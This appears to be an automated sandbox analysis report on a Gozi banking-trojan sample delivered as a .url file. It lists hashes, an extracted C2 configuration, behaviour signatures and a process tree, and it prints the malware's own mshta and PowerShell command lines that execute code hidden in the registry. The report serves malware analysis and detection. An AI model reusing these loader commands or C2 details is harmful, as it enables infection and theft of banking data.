Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2023 14:07

General

  • Target

    Cliente.url

  • Size

    194B

  • MD5

    0da2f6812c1bc76eaa25be1e6a2eaf4c

  • SHA1

    e4b237e5f7bb7b96e9bfb43c126541fc892d3b0a

  • SHA256

    0042887574aae1f954f0459b9448c0fa4501bb8719843940315d466645da9a7b

  • SHA512

    a5495580fae00444b4edbff6894e1e302025ddff295a26fe519bc229724d3961646afb1cece2be892b19840035152a937fa3f7910e4fe04adea751eb319d96cb

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3684
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3980
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3176
        • C:\Windows\System32\rundll32.exe
          "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Cliente.url
          2⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3580
          • C:\Windows\System32\control.exe
            "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl",
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2220
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl",
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1948
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl",
                5⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:392
                • C:\Windows\system32\control.exe
                  C:\Windows\system32\control.exe -h
                  6⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of WriteProcessMemory
                  PID:1252
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                    7⤵
                      PID:4812
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "about:<hta:application><script>V0kl='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(V0kl).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"
            2⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:440
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lucapean -value gp; new-alias -name ivccfci -value iex; ivccfci ([System.Text.Encoding]::ASCII.GetString((lucapean "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4960
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n2atrl4f\n2atrl4f.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:788
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC455.tmp" "c:\Users\Admin\AppData\Local\Temp\n2atrl4f\CSCA2DB01245720440FBF2641C9FF91AAB1.TMP"
                  5⤵
                    PID:3188
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3nq0ankv\3nq0ankv.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4088
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5BC.tmp" "c:\Users\Admin\AppData\Local\Temp\3nq0ankv\CSCAD68B23ADABD41C18CEB807A5388677.TMP"
                    5⤵
                      PID:324
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:232
              • C:\Windows\System32\RuntimeBroker.exe
                C:\Windows\System32\RuntimeBroker.exe -Embedding
                1⤵
                  PID:4964

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl
                  Filesize

                  206KB

                  MD5

                  72e2a5c797954e895a41be5b20f867b2

                  SHA1

                  419aacfb3ccea9b08277bcc9405054fa4238a597

                  SHA256

                  858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

                  SHA512

                  77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\sistema[1].cpl
                  Filesize

                  206KB

                  MD5

                  72e2a5c797954e895a41be5b20f867b2

                  SHA1

                  419aacfb3ccea9b08277bcc9405054fa4238a597

                  SHA256

                  858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

                  SHA512

                  77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

                • C:\Users\Admin\AppData\Local\Temp\3nq0ankv\3nq0ankv.dll
                  Filesize

                  3KB

                  MD5

                  77493e2eea8929147e840131c2118127

                  SHA1

                  24ebc64472d4dc1e71290f485c8cfb9d742f20eb

                  SHA256

                  221b7aa83c1c5213754b51d610c464b771f6c743b90ac6234cbbc59667e797c7

                  SHA512

                  f1cf2f131503a94447ce23777087fe24e4ed262e549056fd2320bc7d14e852c1f91aa861b72fe2d1c6693ec11400c345db999d454af2200cc429eabcda2b5eed

                • C:\Users\Admin\AppData\Local\Temp\RESC455.tmp
                  Filesize

                  1KB

                  MD5

                  b4626763d08e89ab8c22ba7dcab19ce9

                  SHA1

                  32542140115a03c2b4bb6943f0199e3259f30a40

                  SHA256

                  96cd4977027a7cff75ebccd5ca4f1b3060d7a3d4941633ba5e01440e7eb881a9

                  SHA512

                  968cd510fd1c92ed1d787f82ffa5f920b14bf3b6e483bf5f57357e2af62c1b6546fa4f5d8dfa8376a747c0122b04185b9bf3de935e4e2e46dd580fe652aa23cd

                • C:\Users\Admin\AppData\Local\Temp\RESC5BC.tmp
                  Filesize

                  1KB

                  MD5

                  f13746fc263186ce3ebf86d3d4cf0c11

                  SHA1

                  abdcdb3aa07774a0b19622305ac60f72d3e923bd

                  SHA256

                  cd4418c3bfbc65afb31a6e329310dc8169b025821466152c0f57e3b92b5420af

                  SHA512

                  e79f7a16034eaada6ff9c83eb578952b66b62295a3f3fab1e1a626e6cc2bdcc98c800c4338a7f63944aeaed61edc8946cebc73175a6ab337be2494173b246d4b

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fofqiknv.ycd.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\n2atrl4f\n2atrl4f.dll
                  Filesize

                  3KB

                  MD5

                  defdb974bb9c6945475f2140c630eca0

                  SHA1

                  622cec88199c1a638d726f03600d385f7b7f7a32

                  SHA256

                  3884347027098962dbcd2be7f637d075c873fb83e507abf193e5cc66647ffc68

                  SHA512

                  a9b878718aaf63455b7bac6f30741f1c89c94e3d1531f09d3fafd4d281a10b8197db03291df1f32013fd47aeb08125cfec1e5e39329103b34cf45ee39c67c365

                • \??\c:\Users\Admin\AppData\Local\Temp\3nq0ankv\3nq0ankv.0.cs
                  Filesize

                  406B

                  MD5

                  ca8887eacd573690830f71efaf282712

                  SHA1

                  0acd4f49fc8cf6372950792402ec3aeb68569ef8

                  SHA256

                  568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                  SHA512

                  2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                • \??\c:\Users\Admin\AppData\Local\Temp\3nq0ankv\3nq0ankv.cmdline
                  Filesize

                  369B

                  MD5

                  fd1dcfc8e52ba7a99a7ef829c7d3e55b

                  SHA1

                  a380587f2b8b245abd4d30c2d595b48e61d7c5ee

                  SHA256

                  07d6c5d5936841867de37d24134455f4932c035795d1b89d32f16e9768ef685a

                  SHA512

                  9e2f093994406587b8d5ae318f4178a1046bc8eefecbfd378ab16508ae0e04021502b563cca0239233c6d5d27b82abac7434fad2859a23b89596825b90ef5ab1

                • \??\c:\Users\Admin\AppData\Local\Temp\3nq0ankv\CSCAD68B23ADABD41C18CEB807A5388677.TMP
                  Filesize

                  652B

                  MD5

                  5165b4c8af215e9e2d1a58394f71d564

                  SHA1

                  e3fbbba4b7f782bf6397e47a1503ede17199afc1

                  SHA256

                  cb926148a63b2b837334ac81effe69b1026428ecd39b6ddfb1c68435f61b18d6

                  SHA512

                  1c46a0255b9be51437d4dfdfa3a7a9d98511234a07b99dbff4d8399c27cabffefe9c551b8ac3ccabc95ff0d15dbb8950d875aa9d3611af2d28d2367628768ffa

                • \??\c:\Users\Admin\AppData\Local\Temp\n2atrl4f\CSCA2DB01245720440FBF2641C9FF91AAB1.TMP
                  Filesize

                  652B

                  MD5

                  208cb8a65b0a019008e55b2f09778c93

                  SHA1

                  eaf01418cb32d61c31f2a0e616c2c13af768d24a

                  SHA256

                  483bde630ec2e1e08a38ccb4b03cc4c9b5201bb81482298d0e907faf5785fdf9

                  SHA512

                  460c3dc4ad94993826d09fbfac4f463b58458e2a53af7cf578297349139a890d1c5103b0f4e1a4d98642f41dd87c3a1cc0d5ebaf2745644ffd6f810938df9d17

                • \??\c:\Users\Admin\AppData\Local\Temp\n2atrl4f\n2atrl4f.0.cs
                  Filesize

                  405B

                  MD5

                  caed0b2e2cebaecd1db50994e0c15272

                  SHA1

                  5dfac9382598e0ad2e700de4f833de155c9c65fa

                  SHA256

                  21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                  SHA512

                  86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                • \??\c:\Users\Admin\AppData\Local\Temp\n2atrl4f\n2atrl4f.cmdline
                  Filesize

                  369B

                  MD5

                  3a1cc6bb34751cc7a6bbf4cf0872743c

                  SHA1

                  8f9c70c0c709819bbdcb3c6c30a1232955a6f986

                  SHA256

                  6cf6af74cd29f72be55aff74ea58026151fb961701539395dd29b329d4abfa74

                  SHA512

                  1fae96f3186bbf39685e61565b9c430f9c1cc312363c812d6d30cfe7b1e4e39087268a0446adc5207281aedc852f8715650429485d0c399bcca93ce389345c59

                • memory/232-103-0x0000000001490000-0x0000000001528000-memory.dmp
                  Filesize

                  608KB

                • memory/232-104-0x0000000001380000-0x0000000001381000-memory.dmp
                  Filesize

                  4KB

                • memory/232-114-0x0000000001490000-0x0000000001528000-memory.dmp
                  Filesize

                  608KB

                • memory/392-6-0x00000000023E0000-0x0000000002409000-memory.dmp
                  Filesize

                  164KB

                • memory/392-11-0x0000000002770000-0x000000000277E000-memory.dmp
                  Filesize

                  56KB

                • memory/392-95-0x0000000002770000-0x000000000277E000-memory.dmp
                  Filesize

                  56KB

                • memory/392-8-0x0000000002790000-0x000000000279D000-memory.dmp
                  Filesize

                  52KB

                • memory/392-7-0x0000000002770000-0x000000000277E000-memory.dmp
                  Filesize

                  56KB

                • memory/1252-27-0x0000000000780000-0x0000000000824000-memory.dmp
                  Filesize

                  656KB

                • memory/1252-60-0x0000000000780000-0x0000000000824000-memory.dmp
                  Filesize

                  656KB

                • memory/1252-28-0x0000000000830000-0x0000000000831000-memory.dmp
                  Filesize

                  4KB

                • memory/3176-33-0x00000000090A0000-0x0000000009144000-memory.dmp
                  Filesize

                  656KB

                • memory/3176-106-0x00000000090A0000-0x0000000009144000-memory.dmp
                  Filesize

                  656KB

                • memory/3176-34-0x0000000002D90000-0x0000000002D91000-memory.dmp
                  Filesize

                  4KB

                • memory/3684-59-0x000002548E590000-0x000002548E591000-memory.dmp
                  Filesize

                  4KB

                • memory/3684-111-0x000002548EA00000-0x000002548EAA4000-memory.dmp
                  Filesize

                  656KB

                • memory/3684-57-0x000002548EA00000-0x000002548EAA4000-memory.dmp
                  Filesize

                  656KB

                • memory/3980-63-0x0000019CB1A80000-0x0000019CB1B24000-memory.dmp
                  Filesize

                  656KB

                • memory/3980-65-0x0000019CB1A40000-0x0000019CB1A41000-memory.dmp
                  Filesize

                  4KB

                • memory/3980-112-0x0000019CB1A80000-0x0000019CB1B24000-memory.dmp
                  Filesize

                  656KB

                • memory/4812-58-0x0000016BF6140000-0x0000016BF61E4000-memory.dmp
                  Filesize

                  656KB

                • memory/4812-50-0x0000016BF5FD0000-0x0000016BF5FD1000-memory.dmp
                  Filesize

                  4KB

                • memory/4812-54-0x0000016BF6140000-0x0000016BF61E4000-memory.dmp
                  Filesize

                  656KB

                • memory/4812-42-0x0000016BF6140000-0x0000016BF61E4000-memory.dmp
                  Filesize

                  656KB

                • memory/4960-43-0x00000194A23B0000-0x00000194A23C0000-memory.dmp
                  Filesize

                  64KB

                • memory/4960-23-0x00007FFE328E0000-0x00007FFE333A1000-memory.dmp
                  Filesize

                  10.8MB

                • memory/4960-37-0x00007FFE328E0000-0x00007FFE333A1000-memory.dmp
                  Filesize

                  10.8MB

                • memory/4960-55-0x00000194A23B0000-0x00000194A23C0000-memory.dmp
                  Filesize

                  64KB

                • memory/4960-24-0x00000194A23B0000-0x00000194A23C0000-memory.dmp
                  Filesize

                  64KB

                • memory/4960-101-0x0000019489E60000-0x0000019489E68000-memory.dmp
                  Filesize

                  32KB

                • memory/4960-25-0x00000194A23B0000-0x00000194A23C0000-memory.dmp
                  Filesize

                  64KB

                • memory/4960-45-0x00000194A23B0000-0x00000194A23C0000-memory.dmp
                  Filesize

                  64KB

                • memory/4960-85-0x0000019489C30000-0x0000019489C38000-memory.dmp
                  Filesize

                  32KB

                • memory/4960-108-0x00000194A2310000-0x00000194A234D000-memory.dmp
                  Filesize

                  244KB

                • memory/4960-110-0x00007FFE328E0000-0x00007FFE333A1000-memory.dmp
                  Filesize

                  10.8MB

                • memory/4960-22-0x0000019489C40000-0x0000019489C62000-memory.dmp
                  Filesize

                  136KB

                • memory/4964-72-0x000001B573740000-0x000001B5737E4000-memory.dmp
                  Filesize

                  656KB

                • memory/4964-113-0x000001B573740000-0x000001B5737E4000-memory.dmp
                  Filesize

                  656KB

                • memory/4964-74-0x000001B572FE0000-0x000001B572FE1000-memory.dmp
                  Filesize

                  4KB